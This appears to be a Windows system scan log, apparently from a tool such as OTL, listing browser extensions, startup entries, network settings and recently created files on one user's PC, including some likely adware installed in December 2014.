FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 34.0.5\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 34.0.5\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins [2014/12/09 08:42:26 | 000,000,000 | ---D | M]
 
[2013/08/31 10:05:10 | 000,000,000 | ---D | M] (No name found) -- C:\Users\BR\AppData\Roaming\Mozilla\Extensions
[2014/12/24 16:26:26 | 000,000,000 | ---D | M] (No name found) -- C:\Users\BR\AppData\Roaming\Mozilla\Firefox\Profiles\acm539rf.default\extensions
[2013/09/29 00:32:58 | 000,000,000 | ---D | M] (HP Detect) -- C:\Users\BR\AppData\Roaming\Mozilla\Firefox\Profiles\acm539rf.default\extensions\{ab91efd4-6975-4081-8552-1b3922ed79e2}
[2013/09/19 13:33:32 | 000,000,000 | ---D | M] (20-20 3D Viewer - IKEA) -- C:\Users\BR\AppData\Roaming\Mozilla\Firefox\Profiles\acm539rf.default\extensions\[email protected]
[2014/12/24 16:26:26 | 000,000,000 | ---D | M] (TinyWallet) -- C:\Users\BR\AppData\Roaming\Mozilla\Firefox\Profiles\acm539rf.default\extensions\[email protected]
[2014/11/20 08:40:53 | 000,000,000 | ---D | M] (iCloud Bookmarks) -- C:\Users\BR\AppData\Roaming\Mozilla\Firefox\Profiles\acm539rf.default\extensions\[email protected]
[2014/06/14 07:32:55 | 001,999,100 | ---- | M] () (No name found) -- C:\Users\BR\AppData\Roaming\Mozilla\Firefox\Profiles\acm539rf.default\extensions\[email protected]
[2014/06/05 04:25:52 | 000,006,057 | ---- | M] () -- C:\Users\BR\AppData\Roaming\Mozilla\Firefox\Profiles\acm539rf.default\searchplugins\bingp.xml
[2014/12/24 16:37:46 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\extensions
[2014/06/05 04:25:46 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2014/12/09 09:15:02 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
[2013/03/26 17:52:44 | 000,087,568 | ---- | M] ( ) -- C:\Program Files (x86)\mozilla firefox\plugins\nptrademanager.dll
[2013/03/26 17:52:46 | 000,087,568 | ---- | M] ( ) -- C:\Program Files (x86)\mozilla firefox\plugins\npwangwang.dll
 
========== Chrome  ==========
 
CHR - plugin: Error reading preferences file
CHR - Extension: Google Slides = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.8_0\
CHR - Extension: Google Docs = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.0.0.6_0\
CHR - Extension: Google Docs = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.5_0\
CHR - Extension: Google Docs = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\
CHR - Extension: Google Drive = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.2_0\
CHR - Extension: Google Drive = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\
CHR - Extension: Google Drive = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_1\
CHR - Extension: YouTube = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.5_0\
CHR - Extension: YouTube = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\
CHR - Extension: YouTube = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_1\
CHR - Extension: Google Search = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\
CHR - Extension: Google Search = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\
CHR - Extension: Google Search = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_1\
CHR - Extension: Google Sheets = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.0_0\
CHR - Extension: No name found = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\llhlggpfgfhboddiaobbadofpaoamana\1.0\
CHR - Extension: Google Wallet = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.5.0_0\
CHR - Extension: Google Wallet = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\
CHR - Extension: MyHarmony Chrome Plugin = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\omaonpoimgkmbllpdihbnmgphjoipdhf\1.2.0.0_0\
CHR - Extension: Gmail = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_0\
CHR - Extension: Gmail = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\
CHR - Extension: Gmail = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_2\
 
O1 HOSTS File: ([2014/01/25 06:35:52 | 000,000,098 | ---- | M]) - C:\Windows\SysNative\drivers\etc\Hosts
O1 - Hosts: 127.0.0.1       localhost
O1 - Hosts: ::1       localhost
O2 - BHO: (Java™ Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (Microsoft Live Search Toolbar Helper) - {d2ce3e00-f94a-4740-988e-03dc2f38c34f} - c:\Program Files (x86)\MSN\Toolbar\3.0.0566.0\msneshellx.dll (Microsoft Corp.)
O2 - BHO: (Java™ Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O3:64bit: - HKLM\..\Toolbar: (no name) - 10 - No CLSID value found.
O3 - HKLM\..\Toolbar: (Microsoft Live Search Toolbar) - {1E61ED7C-7CB8-49d6-B9E9-AB4C880C8414} - c:\Program Files (x86)\MSN\Toolbar\3.0.0566.0\msneshellx.dll (Microsoft Corp.)
O3 - HKLM\..\Toolbar: (no name) - 10 - No CLSID value found.
O4:64bit: - HKLM..\Run: [AdobeAAMUpdater-1.0] C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe (Adobe Systems Incorporated)
O4:64bit: - HKLM..\Run: [FAHConsole] C:\Program Files\File Association Helper\FAHConsole.exe (Nico Mak Computing)
O4:64bit: - HKLM..\Run: [HotKeysCmds] C:\Windows\SysNative\hkcmd.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxtray.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [LogMeIn GUI] "C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe" File not found
O4:[b]64bit:
- HKLM..\Run: [MSC] C:\Program Files\Microsoft Security Client\msseces.exe (Microsoft Corporation)
O4:[b]64bit:
- HKLM..\Run: [Persistence] C:\Windows\SysNative\igfxpers.exe (Intel Corporation)
O4:[b]64bit:
- HKLM..\Run: [XeroxEndeavorBackgroundTask] C:\Windows\SysNative\xrWCbgnd.dll (Xerox Corporation)
O4 - HKLM..\Run: []  File not found
O4 - HKLM..\Run: [Adobe Creative Cloud] C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe (Adobe Systems Incorporated)
O4 - HKLM..\Run: [DriveUtilitiesHelper] C:\Program Files (x86)\Western Digital\WD Utilities\WDDriveUtilitiesHelper.exe (Western Digital Technologies, Inc.)
O4 - HKLM..\Run: [mobilegeni daemon] C:\Program Files (x86)\Mobogenie\DaemonProcess.exe File not found
O4 - HKLM..\Run: [WD Drive Unlocker] C:\Program Files (x86)\Western Digital\WD Security\WDDriveAutoUnlock.exe (Western Digital Technologies, Inc.)
O4 - HKLM..\Run: [WD Quick View] C:\Program Files (x86)\Western Digital\WD Quick View\WDDMStatus.exe (Western Digital Technologies, Inc.)
O4 - HKLM..\Run: [Wondershare Helper Compact.exe] C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe (Wondershare)
O4 - HKCU..\Run: [052B6A76D3592F59F21802FFF2A3D98838477D09._service_run] "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=service File not found
O4 - HKCU..\Run: [Akamai NetSession Interface] C:\Users\BR\AppData\Local\Akamai\netsession_win.exe (Akamai Technologies, Inc.)
O4 - HKCU..\Run: [aliim] C:\Program Files (x86)\TradeManager\AliIM.exe (Alibaba (China) Co., Ltd.)
O4 - HKCU..\Run: [ApplePhotoStreams] C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe (Apple Inc.)
O4 - HKCU..\Run: [HitsBlender] C:\Program Files (x86)\HitsBlender\hitsblender.exe ()
O4 - HKCU..\Run: [HP Officejet Pro 8620 (NET)] C:\Program Files\HP\HP Officejet Pro 8620\Bin\ScanToPCActivationApp.exe (Hewlett-Packard Development Company, LP)
O4 - HKCU..\Run: [iCloudDrive] C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudDrive.exe (Apple Inc.)
O4 - HKCU..\Run: [iCloudServices] C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe (Apple Inc.)
O4 - HKCU..\RunOnce: [FlashPlayerUpdate] C:\Windows\system32\Macromed\Flash\FlashUtil64_11_9_900_152_ActiveX.exe -update activex File not found
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: PromptOnSecureDesktop = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: SoftwareSASGeneration = 3
O7 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O9:[b]64bit:
- Extra Button: HP Smart Print - {22CC3EBD-C286-43aa-B8E6-06B115F74162} - C:\Program Files (x86)\Hewlett-Packard\Smart Print\SmartPrintSetup.exe (Hewlett-Packard)
O9:[b]64bit:
- Extra 'Tools' menuitem : HP Smart Print - {22CC3EBD-C286-43aa-B8E6-06B115F74162} - C:\Program Files (x86)\Hewlett-Packard\Smart Print\SmartPrintSetup.exe (Hewlett-Packard)
O9 - Extra Button: HP Smart Print - {22CC3EBD-C286-43aa-B8E6-06B115F74162} - C:\Program Files (x86)\Hewlett-Packard\Smart Print\SmartPrintSetup.exe (Hewlett-Packard)
O9 - Extra 'Tools' menuitem : HP Smart Print - {22CC3EBD-C286-43aa-B8E6-06B115F74162} - C:\Program Files (x86)\Hewlett-Packard\Smart Print\SmartPrintSetup.exe (Hewlett-Packard)
O9 - Extra Button: Skype Click to Call - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
O10:[b]64bit:
- NameSpace_Catalog5\Catalog_Entries64\000000000009 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000009 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)
O15 - HKCU\..Trusted Domains: alipay.com ([]http in Trusted sites)
O15 - HKCU\..Trusted Domains: alipay.com ([]https in Trusted sites)
O15 - HKCU\..Trusted Domains: alisoft.com ([]http in Trusted sites)
O15 - HKCU\..Trusted Domains: alisoft.com ([]https in Trusted sites)
O15 - HKCU\..Trusted Domains: taobao.com ([]http in Trusted sites)
O15 - HKCU\..Trusted Domains: taobao.com ([]https in Trusted sites)
O16 - DPF: {82774781-8F4E-11D1-AB1C-0000F8773BF0} https://transfers.ds...ransferCtrl.cab (DLC Class)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 64.59.144.16 64.59.150.132
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{975E2597-4892-450D-9E49-5CA092C4B97F}: DhcpNameServer = 64.59.144.16 64.59.150.132
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{975E2597-4892-450D-9E49-5CA092C4B97F}: NameServer = 208.69.150.250,208.69.150.252
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{A8A07555-0EF1-4315-8F87-711544AA5BDA}: NameServer = 208.69.150.250,208.69.150.252
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{BC556D6E-E0DC-496A-82C9-E12641CD952E}: DhcpNameServer = 192.168.0.2
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{BC556D6E-E0DC-496A-82C9-E12641CD952E}: NameServer = 208.69.150.250,208.69.150.252
O18:[b]64bit:
- Protocol\Handler\livecall - No CLSID value found
O18:[b]64bit:
- Protocol\Handler\ms-help - No CLSID value found
O18:[b]64bit:
- Protocol\Handler\msnim - No CLSID value found
O18:[b]64bit:
- Protocol\Handler\mso-offdap11 - No CLSID value found
O18:[b]64bit:
- Protocol\Handler\skype4com - No CLSID value found
O18:[b]64bit:
- Protocol\Handler\wlmailhtml - No CLSID value found
O18:[b]64bit:
- Protocol\Handler\wlpg - No CLSID value found
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O20:[b]64bit:
- HKLM Winlogon: Shell - (Explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:[b]64bit:
- HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysWOW64\userinit.exe (Microsoft Corporation)
O20:[b]64bit:
- Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\Windows\SysNative\igfxdev.dll (Intel Corporation)
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2013/08/27 16:57:20 | 000,000,000 | ---D | M] - C:\Autodesk -- [ NTFS ]
O32 - AutoRun File - [2011/11/01 12:39:30 | 000,000,079 | ---- | M] () - F:\autorun.inf -- [ UDF ]
O34 - HKLM BootExecute: (autocheck autochk *)
O35:[b]64bit:
- HKLM\..comfile [open] -- "%1" %*
O35:[b]64bit:
- HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:[b]64bit:
- HKLM\...com [@ = comfile] -- "%1" %*
O37:[b]64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
 
========== Files/Folders - Created Within 30 Days ==========
 
[2014/12/30 10:08:28 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{161EA2E7-1A2F-48C2-A791-C4E958323664}
[2014/12/29 13:32:08 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{C0BA43A4-9C39-49CD-A803-0174513E7C00}
[2014/12/28 06:36:09 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{016D6421-1701-49DF-8B52-7F6D4D653389}
[2014/12/27 11:37:04 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{AF92B2FA-5ED5-408A-9B43-0CBB91604675}
[2014/12/26 11:27:37 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{4F520A6F-5EA8-4BEA-81F9-B213BAD2FB51}
[2014/12/26 05:18:33 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{BB9A289D-82F3-4D81-8BCA-37F8290221F8}
[2014/12/25 08:23:20 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{36ECD5BF-2A83-4EA1-9F2A-1372D52EC2F1}
[2014/12/24 16:36:48 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\predm
[2014/12/24 16:15:26 | 000,000,000 | ---D | C] -- C:\ProgramData\436c0126c213f27c
[2014/12/24 16:15:15 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\Chromatic Browser
[2014/12/24 16:15:14 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\Torch
[2014/12/24 16:15:13 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\Comodo
[2014/12/24 16:14:20 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\hitsblender
[2014/12/24 16:13:47 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\HitsBlender
[2014/12/24 10:23:04 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{D1D4E566-89C5-4661-8587-D6DA3F967427}
[2014/12/23 14:38:57 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{E77F53AB-5CFA-4331-956C-89F6A49FE417}
[2014/12/23 01:33:07 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{BCCE8D52-2930-4318-9A56-A0EE74801811}
[2014/12/22 22:26:12 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{F6ACB3ED-A8EB-4261-A125-679BE2200DF1}
[2014/12/22 10:12:36 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{2316A05D-D4E2-4776-AAA8-C916225F95B1}
[2014/12/22 09:30:52 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{44FA6A8F-D05A-4E14-A8A4-9E824AB036DE}
[2014/12/21 09:09:44 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{328853B6-F344-46E7-811C-47AA890B1249}
[2014/12/20 10:05:05 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{F2C52649-44F5-467B-8A99-E251AEF10909}
[2014/12/20 03:04:01 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{0B6787CF-D8C6-48D0-897B-33F9B1773BAD}
[2014/12/19 10:27:51 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{F09B2DFA-DA99-4A9B-97BD-721FCC82C682}
[2014/12/18 10:14:34 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{40FB4ED4-C216-45AB-A934-9A01052FF0A6}
[2014/12/17 11:42:30 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{6C252B3B-90AF-477B-8B9B-C3CB6A4240B8}
[2014/12/16 21:00:04 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{486DC693-CB7F-4A9C-AB4C-119EAEAD3EA2}
[2014/12/16 08:48:31 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{BD179AF9-9327-4607-BA8F-2E09D6442B43}
[2014/12/15 19:40:20 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{3EC3E9E4-4CEC-4EE4-B929-B6DB842B7DF2}
[2014/12/15 07:38:11 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{95F1AFE4-66B6-4106-AF1F-E3E11FFB541D}
[2014/12/14 09:56:36 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{097310BC-264E-423E-BBE6-3C0984A7526F}
[2014/12/13 14:39:24 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{8DF0A1ED-2752-4C1B-9961-B4961D9AB7C4}
[2014/12/13 09:25:26 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{A7A4483E-D295-4DEC-9ECA-9BAA997A158C}
[2014/12/12 17:10:22 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{F42EF7D8-6D04-4744-85A2-68D0885DE588}
[2014/12/12 10:15:52 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{92389730-EE55-458F-9993-0CC5EAE8DD72}
[2014/12/11 10:53:42 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{5181130D-474C-41A2-B058-1F81726AC940}
[2014/12/10 16:46:09 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{5BD4D736-C10B-4BC1-A66A-B22E90D4FF9E}
[2014/12/10 15:45:48 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{C3324AE5-1973-450C-9049-BA3B1DDA1F65}
[2014/12/09 22:31:33 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{D744513F-8905-44B3-AFE8-FBD8F082E66C}
[2014/12/09 08:38:40 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{8745E557-E33E-47E5-80C3-B14966613146}
[2014/12/08 15:39:36 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{E7494A2A-69FF-408C-9493-855166F661D5}
[2014/12/07 23:10:51 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{37789C42-330D-4A1B-8B9F-2A2B553ACC0E}
[2014/12/07 23:09:55 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{04F5D5DE-4566-41A0-9560-4296D7568CE6}
[2014/12/07 08:17:26 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{F632853D-342C-43F3-B48D-0F881466EF47}
[2014/12/07 07:48:05 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{54E5AD7A-46AA-4A28-A002-A698C77C9FCE}
[2014/12/06 10:12:07 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{2EFEAD60-4A39-41D8-9D9E-DABFDD178FE2}
[2014/12/05 21:22:09 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{19426403-8E37-45F2-9B32-7BD5D9196B91}
[2014/12/05 08:54:16 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{4F264C4A-BC66-4EE5-9729-FEBC94940DAE}
[2014/12/04 08:38:36 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{A64B1B77-F70B-4F72-889C-EECA456A2A53}
[2014/12/03 09:10:30 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{BD50A9B9-794F-415E-B22B-E8A226C2566B}
[2014/12/02 19:59:08 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{58E20622-838A-4DF6-87FF-633A4762CED0}
[2014/12/02 07:58:40 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{E63427D4-2D93-4ECF-A293-EA717FEC94B9}
[2014/12/01 07:27:06 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{14077749-0317-4E61-9A41-5B38A6CB89AF}
[2014/12/01 00:27:11 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{9919C10E-8A71-45EC-ACBA-EFF36D84CB71}
[2014/11/30 22:15:05 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{93B92312-0CD7-4DD0-B3E3-5E9EBF0FFAB5}
[2014/11/30 16:29:21 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{9F484F36-6982-41DF-B3F5-3F7F29871782}
 
========== Files - Modified Within 30 Days ==========
 
[2029/07/17 16:13:42 | 000,695,103 | ---- | M] () -- C:\Users\BR\Documents\IMG_0057.JPG
[2029/07/17 16:13:42 | 000,695,103 | ---- | M] () -- C:\Users\BR\Documents\IMG_0057(0).JPG
[2014/12/30 09:39:01 | 000,000,830 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2014/12/30 09:37:00 | 000,000,898 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2014/12/30 02:33:10 | 000,015,792 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2014/12/30 02:33:10 | 000,015,792 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2014/12/30 00:37:00 | 000,000,894 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2014/12/26 13:18:58 | 000,129,752 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\MBAMSwissArmy.sys
[2014/12/24 17:58:21 | 000,008,192 | ---- | M] () -- C:\Windows\SysWow64\WDPABKP.dat
[2014/12/24 17:45:50 | 000,786,622 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[2014/12/24 17:45:50 | 000,669,578 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2014/12/24 17:45:50 | 000,127,194 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2014/12/24 17:38:56 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2014/12/24 17:38:23 | 1314,791,423 | -HS- | M] () -- C:\hiberfil.sys
[2014/12/24 16:14:16 | 000,002,679 | ---- | M] () -- C:\Windows\patsearch.bin
[2014/12/24 16:14:05 | 000,000,000 | -H-- | M] () -- C:\Windows\SysNative\drivers\Msft_Kernel_webinstrNewH_01009.Wdf
[2014/12/24 16:13:49 | 000,001,897 | ---- | M] () -- C:\Users\Public\Desktop\HitsBlender.lnk
[2014/12/23 09:42:11 | 000,228,630 | ---- | M] () -- C:\Users\BR\Documents\Shane parts cost.pdf
[2014/12/15 08:33:06 | 000,001,064 | ---- | M] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2014/12/14 12:08:51 | 000,002,202 | ---- | M] () -- C:\Users\Public\Desktop\HP Officejet Pro 8620.lnk
[2014/12/14 12:08:51 | 000,001,154 | ---- | M] () -- C:\Users\Public\Desktop\Shop for Supplies - HP Officejet Pro 8620.lnk
[2014/12/14 11:15:17 | 000,001,966 | ---- | M] () -- C:\Users\Public\Desktop\HP Print and Scan Doctor.lnk
[2014/12/14 11:13:53 | 000,000,323 | ---- | M] () -- C:\Users\BR\Desktop\HP Printer Diagnostic Tools.url
[2014/12/12 18:47:18 | 000,001,259 | ---- | M] () -- C:\Users\Public\Desktop\Adobe Creative Cloud.lnk
 
========== Files Created - No Company Name ==========
 
[2014/12/24 17:50:25 | 000,008,192 | ---- | C] () -- C:\Windows\SysWow64\WDPABKP.dat
[2014/12/24 16:14:16 | 000,002,679 | ---- | C] () -- C:\Windows\patsearch.bin
[2014/12/24 16:14:05 | 000,000,000 | -H-- | C] () -- C:\Windows\SysNative\drivers\Msft_Kernel_webinstrNewH_01009.Wdf
[2014/12/24 16:13:49 | 000,001,897 | ---- | C] () -- C:\Users\Public\Desktop\HitsBlender.lnk
[2014/12/23 09:42:10 | 000,228,630 | ---- | C] () -- C:\Users\BR\Documents\Shane parts cost.pdf
[2014/12/14 12:08:51 | 000,002,202 | ---- | C] () -- C:\Users\Public\Desktop\HP Officejet Pro 8620.lnk
[2014/12/14 12:08:51 | 000,001,154 | ---- | C] () -- C:\Users\Public\Desktop\Shop for Supplies - HP Officejet Pro 8620.lnk
[2014/12/14 11:13:53 | 000,000,323 | ---- | C] () -- C:\Users\BR\Desktop\HP Printer Diagnostic Tools.url
[2014/12/12 18:47:18 | 000,001,271 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk
[2014/12/12 18:47:18 | 000,001,259 | ---- | C] () -- C:\Users\Public\Desktop\Adobe Creative Cloud.lnk
[2014/11/11 10:57:01 | 000,000,044 | ---- | C] () -- C:\Users\BR\AppData\Roaming\WB.CFG
[2014/10/27 09:02:06 | 000,009,728 | ---- | C] () -- C:\Users\BR\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2014/09/09 15:27:00 | 000,000,000 | ---- | C] () -- C:\Users\BR\AppData\Roaming\bibstats
[2014/09/09 10:57:55 | 000,005,021 | ---- | C] () -- C:\Users\BR\AppData\Local\recently-used.xbel
[2014/09/04 10:40:58 | 000,000,057 | ---- | C] () -- C:\ProgramData\Ament.ini
[2014/07/22 14:02:04 | 000,202,546 | ---- | C] () -- C:\Windows\hpoins18.dat.temp
